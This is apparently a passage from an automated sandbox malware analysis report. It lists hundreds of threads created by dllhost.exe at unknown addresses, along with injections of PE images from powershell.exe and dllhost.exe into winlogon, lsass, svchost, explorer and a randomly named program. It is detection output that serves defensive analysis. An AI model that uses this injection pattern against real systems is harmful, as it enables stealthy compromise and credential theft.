          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA6E2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED7B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A1982AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 95FB2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 670C2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4A4B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 19A42AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1FC2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDC92AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8FC2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2C72AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CE6B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AEFD2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B6942AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A22A2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25AA2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A2F2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63952AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ABC2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F03D2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF3C2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBEB2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E1B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A7DC2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0F52AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7C2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FC2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA5B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CE9B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D6342AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEB72AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0462AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2152AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8EB2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60742AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 569B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8FE62AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3DC22AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 99B22AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 963C2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 81BB2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2D92AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE442AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1D0E2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 86A2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1E52AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2002AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 155B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43E52AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6FC2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68282AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 452E2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27D22AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5C02AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B07C2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F662AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AE852AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B9F2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3CD2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF7C2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43652AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADCF2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40D2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DFE42AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2D12AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8FD52AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FD7A2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DD2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D22208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EB2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26E2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22C2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1462208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1152208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2622208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F22208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2942208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2562208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2882208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E52208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3112208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EF2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C02208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D72208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B42208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2892208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FC2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27F2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A32208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 742208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2822208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3032208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 702208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1112208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C92208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AF2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D62208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A22208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EB2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B62208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FB2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3132208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 902208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 902208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C32208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30F2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10B2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23D2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2862208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BC2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2652208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EF2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 752208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1622208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B82208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15A2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8A2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24D2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2112208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25B2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F22208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3072208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E12208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2982208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EC2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3112208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2152208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2912208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3142208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D22208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 732208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CD2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2732208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AF2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2362208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3032208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FC2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1512208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F72208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 732208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E2208
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E6AB2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E892AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F6AD2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4B842AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF762AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 50E42AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 50E72AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D9A62AC0
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B020000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B050000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD6340000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6963C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE850000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FBADCF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 40D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BEDFE40000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFD2D10000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B38FD50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8FD7A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: EA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2DD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2D20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 26E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 22C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1460000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1150000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2620000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2F20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2940000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: FF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2560000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2880000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2E50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3110000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: C00000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: D70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 25D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2B40000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 6E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2890000 value starts with: 4D5A
